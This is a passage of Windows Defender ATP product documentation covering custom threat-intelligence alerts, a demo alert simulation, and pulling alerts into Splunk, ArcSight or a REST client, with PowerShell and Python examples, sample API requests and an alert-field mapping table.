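            raise ValueError("Sha1 indicator must be exactly 40 hex digits")
        return value.lower()
    if ioc_type == "IpAddress":
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            raise ValueError("IpAddress indicator is not a valid IP address: %r" % (value,))
        if addr.is_loopback or addr.is_unspecified:
            raise ValueError("IpAddress indicator %s can never match real traffic" % addr)
        return str(addr)
    raise ValueError("unsupported indicator type %r; this example knows Sha1 and IpAddress"
                     % (ioc_type,))


def build_alert_definition(name, title, severity, category, internal_description,
                           ux_description, recommended_action, enabled=True):
    """Build the AlertDefinitions payload using the field names shown on the page."""
    for label, text in (("Name", name), ("Title", title), ("Category", category)):
        if not isinstance(text, str) or not text.strip():
            raise ValueError("alert definition field %s must not be empty" % label)
    return {
        "Name": name,
        "Severity": severity,
        "InternalDescription": internal_description,
        "Title": title,
        "UxDescription": ux_description,
        "RecommendedAction": recommended_action,
        "Category": category,
        "Enabled": bool(enabled),
    }


def build_ioc(ioc_type, value, alert_definition_id, detection_function="Equals", enabled=True):
    """Build the IndicatorsOfCompromise payload bound to an existing alert definition.

    'AlertDefinition@odata.bind' is the OData reference the page uses to link the
    indicator to the Id returned when the alert definition was created (Step 4)."""
    if alert_definition_id is None:
        raise ValueError("create the alert definition first; its Id is required")
    return {
        "Type": ioc_type,
        "Value": validate_indicator(ioc_type, value),
        "DetectionFunction": detection_function,
        "Enabled": bool(enabled),
        "AlertDefinition@odata.bind": "AlertDefinitions({0})".format(alert_definition_id),
    }


class TokenCache:
    """Hold an Azure AD access token and renew it before the 60-minute lifetime ends.

    fetch_token is a zero-argument callable that performs the client-credentials
    request from Step 1 and returns the access token string. clock is injectable so
    the renewal logic can be exercised without waiting an hour."""

    def __init__(self, fetch_token, clock=time.time, refresh_margin_seconds=300):
        self._fetch = fetch_token
        self._clock = clock
        self._margin = refresh_margin_seconds  # renew this long before expiry
        self._token = None
        self._expires_at = 0.0
        self.fetch_count = 0  # how many times a token was requested from Azure AD

    def get(self):
        """Return a token that is still valid, fetching a fresh one when needed."""
        now = self._clock()
        if self._token is None or now >= self._expires_at - self._margin:
            self._token = self._fetch()
            self._expires_at = now + TOKEN_LIFETIME_SECONDS
            self.fetch_count += 1
        return self._token
```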

Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Understand threat intelligence concepts
Enable the custom threat intelligence API in Windows Defender ATP
Create custom alerts using the threat intelligence API
PowerShell code examples for the custom threat intelligence API
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
Experiment with custom threat intelligence (TI) alerts
4/5/2019 • 3 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

With the Windows Defender ATP threat intelligence API, you can create custom threat intelligence alerts that can
help you keep track of possible attack activities in your organization.
For more information about threat intelligence concepts, see Understand threat intelligence concepts.
This article demonstrates end-to-end usage of the threat intelligence API to get you started.
You'll be guided through sample steps so you can experience how the threat intelligence API feature works.
Sample steps include creating alert definitions and indicators of compromise (IOCs), and examples of what
triggered custom TI alerts look like.

Step 1: Enable the threat intelligence API and obtain authentication details

To use the threat intelligence API feature, you'll need to enable the feature. For more information, see Enable the
custom threat intelligence application.
This step is required to generate security credentials that you need to use while working with the API.

Step 2: Create a sample alert definition and IOCs


This step will guide you in creating an alert definition and an IOC for a malicious IP.
1. Open a Windows PowerShell ISE.
2. Copy and paste the following PowerShell script. This script will upload a sample alert definition and IOC
to Windows Defender ATP which you can use to generate an alert.
NOTE: Make sure you replace the authUrl, clientId, and clientSecret values with the details you
saved when you enabled the threat intelligence application.
$authUrl = 'Your Authorization URL'
$clientId = 'Your Client ID'
$clientSecret = 'Your Client Secret'

Try
{
    $tokenPayload = @{
        "resource" = 'https://graph.windows.net'
        "client_id" = $clientId
        "client_secret" = $clientSecret
        "grant_type" = 'client_credentials'}

    "Fetching an access token"
    $response = Invoke-RestMethod $authUrl -Method Post -Body $tokenPayload
    $token = $response.access_token
    "Token fetched successfully"

    $headers = @{
        "Content-Type" = "application/json"
        "Accept" = "application/json"
        "Authorization" = "Bearer {0}" -f $token }

    $apiBaseUrl = "https://ti.securitycenter.windows.com/V1.0/"

    $alertDefinitionPayload = @{
        "Name" = "Test Alert"
        "Severity" = "Medium"
        "InternalDescription" = "A test alert used to demonstrate the Windows Defender ATP TI API feature"
        "Title" = "Test alert."
        "UxDescription" = "This is a test alert based on a sample custom alert definition. This alert was triggered manually using a provided test command. It indicates that the Threat Intelligence API has been properly enabled."
        "RecommendedAction" = "No recommended action for this test alert."
        "Category" = "SuspiciousNetworkTraffic"
        "Enabled" = "true"}

    "Creating an Alert Definition"
    $alertDefinition =
        Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) `
            -Method Post -Headers $headers -Body ($alertDefinitionPayload | ConvertTo-Json)
    "Alert Definition created successfully"

    $alertDefinitionId = $alertDefinition.Id

    $iocPayload = @{
        "Type" = "IpAddress"
        "Value" = "52.184.197.12"
        "DetectionFunction" = "Equals"
        "Enabled" = "true"
        "AlertDefinition@odata.bind" = "AlertDefinitions({0})" -f $alertDefinitionId }

    "Creating an Indicator of Compromise"
    $ioc =
        Invoke-RestMethod ("{0}IndicatorsOfCompromise" -f $apiBaseUrl) `
            -Method Post -Headers $headers -Body ($iocPayload | ConvertTo-Json)
    "Indicator of Compromise created successfully"

    "All done!"
}
Catch
{
    "Something went wrong! Got the following exception message: {0}" -f $_.Exception.Message
}

3. Run the script and verify in the results window that the operation succeeded. Wait up to 20 minutes
for the new or updated alert definition to propagate to the detection engines.

NOTE:
If you get the exception “The remote server returned an error: (407) Proxy Authentication Required", you
need to add the proxy configuration by adding the following code to the PowerShell script:

$webclient=New-Object System.Net.WebClient
$creds=Get-Credential
$webclient.Proxy.Credentials=$creds

Step 3: Simulate a custom TI alert


This step will guide you in simulating an event in connection to a malicious IP that will trigger the Windows
Defender ATP custom TI alert.
1. Open a Windows PowerShell ISE on the machine you onboarded to Windows Defender ATP.
2. Type Invoke-WebRequest 52.184.197.12 in the editor and click Run. This call will generate a network
communication event to a dedicated Microsoft demo server that will raise an alert based on the custom
alert definition.

Step 4: Explore the custom alert in the portal


This step will guide you in exploring the custom alert in the portal.
1. Open Windows Defender Security Center on a browser.
2. Log in with your Windows Defender ATP credentials.
3. The dashboard should display the custom TI alert for the victim machine resulting from the simulated
attack.
NOTE
There is a latency of approximately 20 minutes between the time a custom TI is introduced and when it becomes
effective.

Related topics
Understand threat intelligence concepts
Enable the custom threat intelligence API in Windows Defender ATP
Create custom alerts using the threat intelligence API
PowerShell code examples for the custom threat intelligence API
Python code examples for the custom threat intelligence API
Troubleshoot custom threat intelligence issues
Troubleshoot custom threat intelligence issues
4/22/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You might need to troubleshoot issues while using the custom threat intelligence feature.
This page provides detailed steps to troubleshoot issues you might encounter while using the feature.

Learn how to get a new client secret


If your client secret expires or if you've misplaced the copy provided when you were enabling the custom threat
intelligence application, you'll need to get a new secret.
1. Log in to the Azure management portal.
2. Select Active Directory.
3. Select your tenant.
4. Click App registrations > All apps. Then select the relevant application name:
WindowsDefenderATPThreatIntelAPI (formerly known as
WindowsDefenderATPCustomerTiConnector)
WindowsDefenderATPSiemConnector
5. Under Settings, select Keys, then provide a key description and specify the key validity duration.
6. Click Save. The key value is displayed.
7. Copy the value and save it in a safe place.

Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Understand threat intelligence concepts
Enable the custom threat intelligence API in Windows Defender ATP
Create custom alerts using the threat intelligence API
PowerShell code examples for the custom threat intelligence API
Python code examples for the custom threat intelligence API
Experiment with custom threat intelligence alerts
Pull alerts to your SIEM tools
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Pull alerts using security information and event management (SIEM) tools

Windows Defender ATP supports security information and event management (SIEM) tools to pull alerts. Windows
Defender ATP exposes alerts through an HTTPS endpoint hosted in Azure. The endpoint can be configured to pull
alerts from your enterprise tenant in Azure Active Directory (AAD) using the OAuth 2.0 authentication protocol for
an AAD application that represents the specific SIEM connector installed in your environment.
Windows Defender ATP currently supports the following SIEM tools:
Splunk
HP ArcSight
To use either of these supported SIEM tools you'll need to:
Enable SIEM integration in Windows Defender ATP
Configure the supported SIEM tool:
Configure Splunk to pull Windows Defender ATP alerts
Configure HP ArcSight to pull Windows Defender ATP alerts
For more information on the list of fields exposed in the alerts API, see Windows Defender ATP alert API fields.

Pull Windows Defender ATP alerts using REST API


Windows Defender ATP supports the OAuth 2.0 protocol to pull alerts using REST API.
For more information, see Pull Windows Defender ATP alerts using REST API.

In this section
TOPIC | DESCRIPTION
Enable SIEM integration in Windows Defender ATP | Learn about enabling the SIEM integration feature in the Settings page in the portal so that you can use and generate the required information to configure supported SIEM tools.
Configure Splunk to pull Windows Defender ATP alerts | Learn about installing the REST API Modular Input app and other configuration settings to enable Splunk to pull Windows Defender ATP alerts.
Configure HP ArcSight to pull Windows Defender ATP alerts | Learn about installing the HP ArcSight REST FlexConnector package and the files you need to configure ArcSight to pull Windows Defender ATP alerts.
Windows Defender ATP alert API fields | Understand what data fields are exposed as part of the alerts API and how they map to Windows Defender Security Center.
Pull Windows Defender ATP alerts using REST API | Use the Client credentials OAuth 2.0 flow to pull alerts from Windows Defender ATP using REST API.
Troubleshoot SIEM tool integration issues | Address issues you might encounter when using the SIEM integration feature.
Enable SIEM integration in Windows Defender ATP
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Enable security information and event management (SIEM) integration so you can pull alerts from Windows
Defender Security Center using your SIEM solution or by connecting directly to the alerts REST API.

Prerequisites
The user who activates the setting must have permissions to create an app in Azure Active Directory (AAD ). This
is typically someone with a Global administrator role.
During the initial activation, a pop-up screen is displayed for credentials to be entered. Make sure that you allow
pop-ups for this site.

Enabling SIEM integration


1. In the navigation pane, select Settings > SIEM.

TIP
If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker settings of
your browser. It might be blocking the new window being opened when you enable the capability.

2. Select Enable SIEM integration. This activates the SIEM connector access details section with
pre-populated values, and an application is created under your Azure Active Directory (AAD) tenant.

WARNING
The client secret is only displayed once. Make sure you keep a copy of it in a safe place.
For more information about getting a new secret, see Learn how to get a new secret.
3. Choose the SIEM type you use in your organization.

NOTE
If you select HP ArcSight, you'll need to save these two configuration files:
WDATP-connector.jsonparser.properties
WDATP-connector.properties

If you want to connect directly to the alerts REST API through programmatic access, choose Generic API.
4. Copy the individual values or select Save details to file to download a file that contains all the values.
5. Select Generate tokens to get an access and refresh token.

NOTE
You'll need to generate a new Refresh token every 90 days.

You can now proceed with configuring your SIEM solution or connecting to the alerts REST API through
programmatic access. You'll need to use the tokens when configuring your SIEM solution to allow it to receive
alerts from Windows Defender Security Center.
Integrate Windows Defender ATP with IBM QRadar
You can configure IBM QRadar to collect alerts from Windows Defender ATP. For more information, see IBM
Knowledge Center.

Related topics
Configure Splunk to pull Windows Defender ATP alerts
Configure HP ArcSight to pull Windows Defender ATP alerts
Windows Defender ATP alert API fields
Pull Windows Defender ATP alerts using REST API
Troubleshoot SIEM tool integration issues
Configure Splunk to pull Windows Defender ATP alerts
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

You'll need to configure Splunk so that it can pull Windows Defender ATP alerts.

Before you begin


Install the REST API Modular Input app in Splunk.
Make sure you have enabled the SIEM integration feature from the Settings menu. For more
information, see Enable SIEM integration in Windows Defender ATP
Have the details file you saved from enabling the SIEM integration feature ready. You'll need to get the
following values:
OAuth 2 Token refresh URL
OAuth 2 Client ID
OAuth 2 Client secret
Have the refresh token that you generated from the SIEM integration feature ready.

Configure Splunk
1. Log in to Splunk.
2. Click Search & Reporting, then Settings > Data inputs.
3. Click REST under Local inputs.
NOTE: This input will only appear after you install the REST API Modular Input app.
4. Click New.
5. Type the following values in the required fields, then click Save:
NOTE: All other values in the form are optional and can be left blank.

FIELD | VALUE
Endpoint URL | Depending on the location of your datacenter, select any of the following URLs: For EU: https://wdatp-alertexporter-eu.securitycenter.windows.com/api/alerts ; For US: https://wdatp-alertexporter-us.securitycenter.windows.com/api/alerts ; For UK: https://wdatp-alertexporter-uk.securitycenter.windows.com/api/alerts
HTTP Method | GET
Authentication Type | oauth2
OAuth 2 Access token | Use the value that you generated when you enabled the SIEM integration feature. NOTE: The access token expires after an hour.
OAuth 2 Refresh Token | Use the value that you generated when you enabled the SIEM integration feature.
OAuth 2 Token Refresh URL | Use the value from the details file you saved when you enabled the SIEM integration feature.
OAuth 2 Client ID | Use the value from the details file you saved when you enabled the SIEM integration feature.
OAuth 2 Client Secret | Use the value from the details file you saved when you enabled the SIEM integration feature.
Response type | Json
Response Handler | JSONArrayHandler
Polling Interval | Number of seconds that Splunk will ping the Windows Defender ATP machine. Accepted values are in seconds.
Set sourcetype | Manual
Source type | _json

After completing these configuration steps, you can go to the Splunk dashboard and run queries.

View alerts using Splunk solution explorer


Use the solution explorer to view alerts in Splunk.
1. In Splunk, go to Settings > Searches, reports, and alerts.
2. Select New.
3. Enter the following details:
Destination app: Select Search & Reporting (search)
Search name: Enter a name for the query
Search: Enter a query, for example:
source="rest://windows atp alerts"|spath|table*

Other values are optional and can be left with the default values.
4. Click Save. The query is saved in the list of searches.
5. Find the query you saved in the list and click Run. The results are displayed based on your query.

TIP
To minimize alert duplications, you can use the following query:
source="rest://windows atp alerts" | spath | dedup _raw | table *

Related topics
Enable SIEM integration in Windows Defender ATP
Configure ArcSight to pull Windows Defender ATP alerts
Windows Defender ATP alert API fields
Pull Windows Defender ATP alerts using REST API
Troubleshoot SIEM tool integration issues
Configure HP ArcSight to pull Windows Defender ATP alerts
4/5/2019 • 6 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

You'll need to install and configure some files and tools to use HP ArcSight so that it can pull Windows Defender
ATP alerts.

Before you begin


Configuring the HP ArcSight Connector tool requires several configuration files for it to pull and parse alerts
from your Azure Active Directory (AAD) application.
This section guides you in getting the necessary information to set and use the required configuration files
correctly.
Make sure you have enabled the SIEM integration feature from the Settings menu. For more information,
see Enable SIEM integration in Windows Defender ATP.
Have the file you saved from enabling the SIEM integration feature ready. You'll need to get the following
values:
OAuth 2.0 Token refresh URL
OAuth 2.0 Client ID
OAuth 2.0 Client secret
Have the following configuration files ready:
WDATP-connector.properties
WDATP-connector.jsonparser.properties
You would have saved a .zip file which contains these two files when you chose HP ArcSight as the
SIEM type you use in your organization.
Make sure you generate the following tokens and have them ready:
Access token
Refresh token
You can generate these tokens from the SIEM integration setup section of the portal.

Install and configure HP ArcSight FlexConnector


The following steps assume that you have completed all the required steps in Before you begin.
1. Install the latest 32-bit Windows FlexConnector installer. You can find this in the HPE Software center. The
tool is typically installed in the following default location:
C:\Program Files\ArcSightFlexConnectors\current\bin .
You can choose where to save the tool, for example C:\folder_location\current\bin where folder_location
represents the installation location.
2. Follow the installation wizard through the following tasks:
Introduction
Choose Install Folder
Choose Install Set
Choose Shortcut Folder
Pre-Installation Summary
Installing...
You can keep the default values for each of these tasks or modify the selection to suit your requirements.
3. Open File Explorer and locate the two configuration files you saved when you enabled the SIEM
integration feature. Put the two files in the FlexConnector installation location, for example:
WDATP-connector.jsonparser.properties: C:\folder_location\current\user\agent\flexagent\
WDATP-connector.properties: C:\folder_location\current\user\agent\flexagent\
NOTE: You must put the configuration files in this location, where folder_location represents the location
where you installed the tool.
4. After the installation of the core connector completes, the Connector Setup window opens. In the
Connector Setup window, select Add a Connector.
5. Select Type: ArcSight FlexConnector REST and click Next.
6. Type the following information in the parameter details form. All other values in the form are optional and
can be left blank.

FIELD | VALUE
Configuration File | Type in the name of the client property file. The name must match the file provided in the .zip that you downloaded. For example, if the configuration file in the "flexagent" directory is named "WDATP-Connector.jsonparser.properties", you must type "WDATP-Connector" as the name of the client property file.
Events URL | Depending on the location of your datacenter, select either the EU or the US URL: For EU: https://wdatp-alertexporter-eu.windows.com/api/alerts/?sinceTimeUtc=$START_AT_TIME ; For US: https://wdatp-alertexporter-us.windows.com/api/alerts/?sinceTimeUtc=$START_AT_TIME ; For UK: https://wdatp-alertexporter-uk.windows.com/api/alerts/?sinceTimeUtc=$START_AT_TIME
Authentication Type | OAuth 2
OAuth 2 Client Properties file | Browse to the location of the wdatp-connector.properties file. The name must match the file provided in the .zip that you downloaded.
Refresh Token | You can obtain a refresh token in two ways: by generating a refresh token from the SIEM settings page or using the restutil tool. For more information on generating a refresh token from the Preferences setup, see Enable SIEM integration in Windows Defender ATP. Get your refresh token using the restutil tool:
    a. Open a command prompt. Navigate to C:\folder_location\current\bin where folder_location represents the location where you installed the tool.
    b. Type: arcsight restutil token -config from the bin directory. For example: arcsight restutil boxtoken -proxy proxy.location.hp.com:8080. A Web browser window will open.
    c. Type in your credentials then click on the password field to let the page redirect. In the login prompt, enter your credentials.
    d. A refresh token is shown in the command prompt.
    e. Copy and paste it into the Refresh Token field.

7. A browser window is opened by the connector. Login with your application credentials. After you log in,
you'll be asked to give permission to your OAuth2 Client. You must give permission to your OAuth 2
Client so that the connector configuration can authenticate.
If the redirect_uri is an https URL, you'll be redirected to a URL on the local host. You'll see a page that
asks you to trust the certificate supplied by the connector running on the local host. You'll need to
trust this certificate if the redirect_uri is an https URL.

If, however, you specify an http URL for the redirect_uri, you do not need to provide consent in trusting the
certificate.
8. Continue with the connector setup by returning to the HP ArcSight Connector Setup window.
9. Select the ArcSight Manager (encrypted) as the destination and click Next.
10. Type in the destination IP/hostname in Manager Hostname and your credentials in the parameters form.
All other values in the form should be retained with the default values. Click Next.
11. Type in a name for the connector in the connector details form. All other values in the form are optional
and can be left blank. Click Next.
12. The ESM Manager import certificate window is shown. Select Import the certificate to connector from
destination and click Next. The Add connector Summary window is displayed and the certificate is
imported.
13. Verify that the details in the Add connector Summary window are correct, then click Next.
14. Select Install as a service and click Next.
15. Type a name in the Service Internal Name field. All other values in the form can be retained with the
default values or left blank. Click Next.
16. Type in the service parameters and click Next. A window with the Install Service Summary is shown.
Click Next.
17. Finish the installation by selecting Exit and Next.

Install and configure the HP ArcSight console


1. Follow the installation wizard through the following tasks:
Introduction
License Agreement
Special Notice
Choose ArcSight installation directory
Choose Shortcut Folder
Pre-Installation Summary
2. Click Install. After the installation completes, the ArcSight Console Configuration Wizard opens.
3. Type localhost in Manager Host Name and 8443 in Manager Port then click Next.
4. Select Use direct connection, then click Next.
5. Select Password Based Authentication, then click Next.
6. Select This is a single user installation. (Recommended), then click Next.
7. Click Done to quit the installer.
8. Login to the HP ArcSight console.
9. Navigate to Active channel set > New Condition > Device > Device Product.
10. Set Device Product = Windows Defender ATP. When you've verified that events are flowing to the
tool, stop the process again and go to Windows Services and start the ArcSight FlexConnector REST.
You can now run queries in the HP ArcSight console.
Windows Defender ATP alerts will appear as discrete events, with "Microsoft" as the vendor and "Windows
Defender ATP" as the device name.

Troubleshooting HP ArcSight connection


Problem: Failed to refresh the token. You can find the log in C:\folder_location\current\logs, where
folder_location represents the location where you installed the tool. Open agent.log and look for
ERROR/FATAL/WARN.

Symptom: You get the following error message:

Failed to refresh the token. Set reauthenticate to true: com.arcsight.common.al.e: Failed to refresh access
token: status=HTTP/1.1 400 Bad Request FATAL EXCEPTION: Could not refresh the access token

Solution:
1. Stop the process by pressing Ctrl + C in the Connector window. Click Y when asked "Terminate batch job
Y/N?".
2. Navigate to the folder where you stored the WDATP-connector.properties file and edit it to add the
following value: reauthenticate=true.
3. Restart the connector by running the following command: arcsight.bat connectors.
A browser window appears. Allow it to run, it should disappear, and the connector should now be running.
NOTE
Verify that the connector is running by stopping the process again. Then start the connector again, and no browser window
should appear.

Related topics
Enable SIEM integration in Windows Defender ATP
Configure Splunk to pull Windows Defender ATP alerts
Pull Windows Defender ATP alerts using REST API
Troubleshoot SIEM tool integration issues
Windows Defender ATP SIEM alert API fields
4/5/2019 • 3 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Understand what data fields are exposed as part of the alerts API and how they map to Windows Defender Security Center.

Alert API fields and portal mapping


The following table lists the available fields exposed in the alerts API payload. It shows examples for the populated values and a
reference on how data is reflected on the portal.
The ArcSight field column contains the default mapping between the Windows Defender ATP fields and the built-in fields in
ArcSight. You can download the mapping file from the portal when you enable the SIEM integration feature and you can modify it to
match the needs of your organization. For more information, see Enable SIEM integration in Windows Defender ATP.
Field numbers match the numbers in the images below.

PORTAL LABEL | SIEM FIELD NAME | ARCSIGHT FIELD | EXAMPLE VALUE | DESCRIPTION
1 | AlertTitle | name | A dll was unexpectedly loaded into a high integrity process without a UAC prompt | Value available for every alert.
2 | Severity | deviceSeverity | Medium | Value available for every alert.
3 | Category | deviceEventCategory | Privilege Escalation | Value available for every alert.
4 | Source | sourceServiceName | WindowsDefenderATP | Windows Defender Antivirus or Windows Defender ATP. Value available for every alert.
5 | MachineName | sourceHostName | liz-bean | Value available for every alert.
6 | FileName | fileName | Robocopy.exe | Available for alerts associated with a file or process.
7 | FilePath | filePath | C:\Windows\System32\Robocopy.exe | Available for alerts associated with a file or process.
8 | UserDomain | sourceNtDomain | contoso | The domain of the user context running the activity, available for Windows Defender ATP behavioral based alerts.
9 | UserName | sourceUserName | liz-bean | The user context running the activity, available for Windows Defender ATP behavioral based alerts.
10 | Sha1 | fileHash | 5b4b3985339529be3151d331395f667e1d5b7f35 | Available for alerts associated with a file or process.
11 | Md5 | deviceCustomString5 | 55394b85cb5edddff551f6f3faa9d8eb | Available for Windows Defender AV alerts.
12 | Sha256 | deviceCustomString6 | 9987474deb9f457ece2a9533a08ec173a0986fa3aa6ac355eeba5b622e4a43f5 | Available for Windows Defender AV alerts.
13 | ThreatName | deviceCustomString1 | Trojan:Win32/Skeeyah.A!bit | Available for Windows Defender AV alerts.
14 | IpAddress | sourceAddress | 218.90.204.141 | Available for alerts associated to network events. For example, 'Communication to a malicious network destination'.
15 | Url | requestUrl | down.esales360.cn | Available for alerts associated to network events. For example, 'Communication to a malicious network destination'.
16 | RemediationIsSuccess | deviceCustomNumber2 | TRUE | Available for Windows Defender AV alerts. ArcSight value is 1 when TRUE and 0 when FALSE.
17 | WasExecutingWhileDetected | deviceCustomNumber1 | FALSE | Available for Windows Defender AV alerts. ArcSight value is 1 when TRUE and 0 when FALSE.
18 | AlertId | externalId | 636210704265059241_673569822 | Value available for every alert.
19 | LinkToWDATP | flexString1 | https://securitycenter.windows.com/alert/636210704265059241_673569 | Value available for every alert.
20 | AlertTime | deviceReceiptTime | 2017-05-07T01:56:59.3191352Z | The time the activity relevant to the alert occurred. Value available for every alert.
21 | MachineDomain | sourceDnsDomain | contoso.com | Domain name not relevant for AAD joined machines. Value available for every alert.
22 | Actor | deviceCustomString4 | | Available for alerts related to a known actor group.
21+5 | ComputerDnsName | No mapping | liz-bean.contoso.com | The machine fully qualified domain name. Value available for every alert.
PORTAL LABEL SIEM FIELD NAME ARCSIGHT FIELD EXAMPLE VALUE DESCRIPTION

LogOnUsers sourceUserId contoso\liz-bean; The domain and user of


contoso\jay-hardee the interactive logon
user/s at the time of the
event. Note: For machines
on Windows 10 version
1607, the domain
information will not be
available.

InternalIPv4List No mapping 192.168.1.7, 10.1.14.1 List of IPV4 internal IPs


for active network
interfaces.

InternalIPv6List No mapping fd30:0000:0000:0001:ff4e: List of IPV6 internal IPs


003e:0009:000e, for active network
FE80:CD00:0000:0CDE:12 interfaces.
57:0000:211E:729C

Internal field LastProcessedTimeUtc No mapping 2017-05- Time when event arrived


07T01:56:58.9936648Z at the backend. This field
can be used when setting
the request parameter for
the range of time that
alerts are retrieved.

Not part of the schema deviceVendor Static value in the


ArcSight mapping -
'Microsoft'.

Not part of the schema deviceProduct Static value in the


ArcSight mapping -
'Windows Defender ATP'.

Not part of the schema deviceVersion Static value in the


ArcSight mapping - '2.0',
used to identify the
mapping versions.
Related topics
Enable SIEM integration in Windows Defender ATP
Configure Splunk to pull Windows Defender ATP alerts
Configure ArcSight to pull Windows Defender ATP alerts
Pull Windows Defender ATP alerts using REST API
Troubleshoot SIEM tool integration issues
Pull Windows Defender ATP alerts using SIEM REST API
4/5/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Windows Defender ATP supports the OAuth 2.0 protocol to pull alerts from the portal.
In general, the OAuth 2.0 protocol supports four types of flows:
Authorization grant flow
Implicit flow
Client credentials flow
Resource owner flow
For more information about the OAuth specifications, see the OAuth Website.
Windows Defender ATP supports the Authorization grant flow and the Client credential flow to obtain access to alerts from the portal, with Azure Active Directory (AAD) as the authorization server.
The Authorization grant flow uses user credentials to get an authorization code, which is then used to obtain an access token.
The Client credential flow uses client credentials to authenticate against the Windows Defender ATP endpoint URL. This flow is suitable for scenarios in which an OAuth client makes requests to an API that doesn't require user credentials.
Use the following method in the Windows Defender ATP API to pull alerts in JSON format.

NOTE
Windows Defender Security Center merges similar alert detections into a single alert. This API pulls alert detections in its raw form based
on the query parameters you set, enabling you to apply your own grouping and filtering.

Before you begin


Before calling the Windows Defender ATP endpoint to pull alerts, you'll need to enable the SIEM integration
application in Azure Active Directory (AAD). For more information, see Enable SIEM integration in Windows Defender
ATP.
Take note of the following values in your Azure application registration. You need these values to configure the OAuth
flow in your service or daemon app:
Application ID (unique to your application)
App key, or secret (unique to your application)
Your app's OAuth 2.0 token endpoint
Find this value by clicking View Endpoints at the bottom of the Azure Management Portal in your app's
page. The endpoint will look like https://login.microsoftonline.com/{tenantId}/oauth2/token .

Get an access token


Before creating calls to the endpoint, you'll need to get an access token.
You'll use the access token to access the protected resource, which are alerts in Windows Defender ATP.
To get an access token, you'll need to do a POST request to the token issuing endpoint. Here is a sample request:
POST /72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/token HTTP/1.1
Host: login.microsoftonline.com
Content-Type: application/x-www-form-urlencoded

resource=https%3A%2F%2Fgraph.windows.net&client_id=35e0f735-5fe4-4693-9e68-3de80f1d3745&client_secret=IKXc6PxB2eoFNJ%2FIT%2Bl2JZZD9d9032VXz6Ul3D2WyUQ%3D&grant_type=client_credentials

The response will include an access token and expiry information.

{
"token_type": "Bearer",
"expires_in": "3599",
"ext_expires_in": "0",
"expires_on": "1488720683",
"not_before": "1488720683",
"resource": "https://graph.windows.net",
"access_token":"eyJ0eXaioJJOIneiowiouqSuzNiZ345FYOVkaJL0625TueyaJasjhIjEnbMlWqP..."
}

You can now use the value in the access_token field in a request to the Windows Defender ATP API.

Request
With an access token, your app can make authenticated requests to the Windows Defender ATP API. Your app must append
the access token to the Authorization header of each request.
Request syntax

| Method | Request URI |
|---|---|
| GET | Use the URI applicable for your region. For EU: https://wdatp-alertexporter-eu.windows.com/api/alerts. For US: https://wdatp-alertexporter-us.windows.com/api/alerts. For UK: https://wdatp-alertexporter-uk.windows.com/api/alerts |

Request header

| Header | Type | Description |
|---|---|---|
| Authorization | string | Required. The Azure AD access token in the form Bearer <token>. |

Request parameters
Use optional query parameters to specify and control the amount of data returned in a response. If you call this method
without parameters, the response contains all the alerts in your organization in the last 2 hours.

| Name | Value | Description |
|---|---|---|
| DateTime?sinceTimeUtc | string | Defines the lower time bound alerts are retrieved from, based on the field LastProcessedTimeUtc. The time range will be: from sinceTimeUtc time to current time. NOTE: When not specified, all alerts generated in the last two hours are retrieved. |
| DateTime?untilTimeUtc | string | Defines the upper time bound alerts are retrieved. The time range will be: from sinceTimeUtc time to untilTimeUtc time. NOTE: When not specified, the default value will be the current time. |
| string ago | string | Pulls alerts in the following time range: from (current_time - ago) time to current_time time. Value should be set according to the ISO 8601 duration format. E.g. ago=PT10M will pull alerts received in the last 10 minutes. |
| int?limit | int | Defines the number of alerts to be retrieved. Most recent alerts will be retrieved based on the number defined. NOTE: When not specified, all alerts available in the time range will be retrieved. |
| machinegroups | String | Specifies machine groups to pull alerts from. NOTE: When not specified, alerts from all machine groups will be retrieved. Example: https://wdatp-alertexporter-eu.securitycenter.windows.com/api/Alerts/?machinegroups=UKMachines&machinegroups=FranceMachines |
| DeviceCreatedMachineTags | string | Single machine tag from the registry. |
| CloudCreatedMachineTags | string | Machine tags that were created in Windows Defender Security Center. |


Request example
The following example demonstrates how to retrieve all the alerts in your organization.

GET https://wdatp-alertexporter-eu.windows.com/api/alerts
Authorization: Bearer <your access token>

The following example demonstrates a request to get the last 20 alerts since 2016-09-12 00:00:00.

GET https://wdatp-alertexporter-eu.windows.com/api/alerts?limit=20&sinceTimeUtc=2016-09-12T00:00:00.000
Authorization: Bearer <your access token>

Response
The return value is an array of alert objects in JSON format.
Here is an example return value:
{"AlertTime":"2017-01-23T07:32:54.1861171Z",
"ComputerDnsName":"desktop-bvccckk",
"AlertTitle":"Suspicious PowerShell commandline",
"Category":"SuspiciousActivity",
"Severity":"Medium",
"AlertId":"636207535742330111_-1114309685",
"Actor":null,
"LinkToWDATP":"https://securitycenter.windows.com/alert/636207535742330111_-1114309685",
"IocName":null,
"IocValue":null,
"CreatorIocName":null,
"CreatorIocValue":null,
"Sha1":"69484ca722b4285a234896a2e31707cbedc59ef9",
"FileName":"powershell.exe",
"FilePath":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0",
"IpAddress":null,
"Url":null,
